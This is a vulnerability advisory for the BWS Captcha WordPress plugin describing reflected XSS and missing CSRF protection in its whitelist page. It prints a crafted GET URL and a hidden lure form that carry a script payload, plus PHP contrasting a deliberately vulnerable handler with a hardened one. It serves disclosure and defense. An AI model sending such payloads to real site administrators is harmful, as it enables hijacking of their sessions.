vendor: Captcha
by: Colette Chamberland
CVSS: 7.5 (HIGH)
Unsanitized input in whitelist.php
CWE: 79
Product Name: Captcha
Affected Version From: <=4.1.5
Affected Version To: <=4.1.5
Patch Exists: YES
Related CWE: None
CPE: a:bestwebsoft:captcha
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress 4.2.x
2016
BWS Captcha Multiple Vulnerabilities
The variable can be passed in using a GET as well as a POST request. An attacker could send an unsuspecting authenticated admin a URL crafted like this:

    http://wwww.victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist&s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

or they could send a form (there is no CSRF token check):

    <form method="post" action="http://victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist">
      <input type="hidden" name="s" value="<script>alert(1);</script>">
      <input type="submit" name="Search IP" value="Click here to claim your prize!">
    </form>

Either would execute the XSS as long as the admin was logged in to the site.
Mitigation:
Sanitize user input and validate it before using it in the application.
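
The mitigation above, sketched for a search field like `s` as an added example; this is not the plugin's code or its actual patch. The `example_` function, action and field names are hypothetical, and the code assumes it runs inside a WordPress admin page so that the core functions it calls are loaded.

```php
<?php
// Added illustration, not code from the Captcha plugin.
// All example_* names are hypothetical.

// Vulnerable pattern: the request value is echoed into HTML unescaped
// and no nonce is checked, so a crafted link or cross-site form works.
function example_render_search_vulnerable() {
    $s = isset( $_REQUEST['s'] ) ? $_REQUEST['s'] : '';
    echo '<form method="post">';
    echo '<input type="text" name="s" value="' . $s . '">';
    echo '<input type="submit" value="Search IP">';
    echo '</form>';
}

// Hardened pattern: capability check, nonce check on any supplied
// search term (GET or POST), sanitize on input, escape on output.
function example_render_search_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    $s = '';
    if ( isset( $_REQUEST['s'] ) ) {
        // check_admin_referer() reads the nonce from $_REQUEST and stops
        // the request when it is missing or invalid, so a link or form
        // prepared on another site never reaches the output code below.
        check_admin_referer( 'example_whitelist_search', 'example_nonce' );

        // Strip tags, control characters and extra whitespace.
        $s = sanitize_text_field( wp_unslash( $_REQUEST['s'] ) );
    }

    echo '<form method="post">';
    // Emits the hidden nonce field that the check above expects.
    wp_nonce_field( 'example_whitelist_search', 'example_nonce' );
    // esc_attr() encodes quotes and angle brackets for attribute context.
    echo '<input type="text" name="s" value="' . esc_attr( $s ) . '">';
    echo '<input type="submit" value="Search IP">';
    echo '</form>';

    if ( '' !== $s ) {
        // esc_html() for the same value in element content.
        echo '<p>Results for: ' . esc_html( $s ) . '</p>';
    }
}
```

Output escaping is what stops the script from running; the nonce check closes the separate gap that the form can be submitted from another site.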